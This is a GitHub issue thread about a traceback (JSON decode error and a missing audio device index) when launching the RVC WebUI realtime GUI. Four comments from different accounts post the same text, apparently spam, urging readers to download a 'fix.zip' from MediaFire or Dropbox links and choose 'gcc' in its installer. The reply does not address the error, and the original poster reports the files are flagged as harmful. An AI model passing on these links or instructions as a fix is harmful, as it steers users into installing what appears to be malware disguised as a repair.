### ISSUE TITLE
The realtime gui problem

### ISSUE THREAD

**Issue by NobodyK92** [RVC-Project/Retrieval-based-Voice-Conversion-WebUI#2267]
I get this error if I want to start the realtime gui, any help? ^^

2024-08-26 00:56:59 | INFO | faiss.loader | Loading faiss with AVX2 support.
2024-08-26 00:56:59 | INFO | faiss.loader | Could not load library with AVX2 support due to:
ModuleNotFoundError("No module named 'faiss.swigfaiss_avx2'")
2024-08-26 00:56:59 | INFO | faiss.loader | Loading faiss.
2024-08-26 00:56:59 | INFO | faiss.loader | Successfully loaded faiss.
2024-08-26 00:57:00 | INFO | configs.config | Found GPU NVIDIA GeForce RTX 3090 Ti
2024-08-26 00:57:00 | INFO | configs.config | Half-precision floating-point: True, device: cuda:0
Traceback (most recent call last):
  File "D:\RVC\Retrieval-based-Voice-Conversion-WebUI\gui_v1.py", line 157, in load
    data = json.load(j)
  File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\json\__init__.py", line 293, in load
    return loads(fp.read(),
  File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\json\__init__.py", line 346, in loads
    return _default_decoder.decode(s)
  File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\json\decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\json\decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "D:\RVC\Retrieval-based-Voice-Conversion-WebUI\gui_v1.py", line 1070, in <module>
    gui = GUI()
  File "D:\RVC\Retrieval-based-Voice-Conversion-WebUI\gui_v1.py", line 150, in __init__
    self.launcher()
  File "D:\RVC\Retrieval-based-Voice-Conversion-WebUI\gui_v1.py", line 224, in launcher
    data = self.load()
  File "D:\RVC\Retrieval-based-Voice-Conversion-WebUI\gui_v1.py", line 195, in load
    self.input_devices_indices.index(sd.default.device[0])
ValueError: -1 is not in list

Thanks <3

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by nobodyk1992** [comment]
Thank you guys for the fast reply and files 🫂

**Comment by nobodyk1992** [comment]
Ou the files cannot be downloaded, they seem to be harmful? 🤔
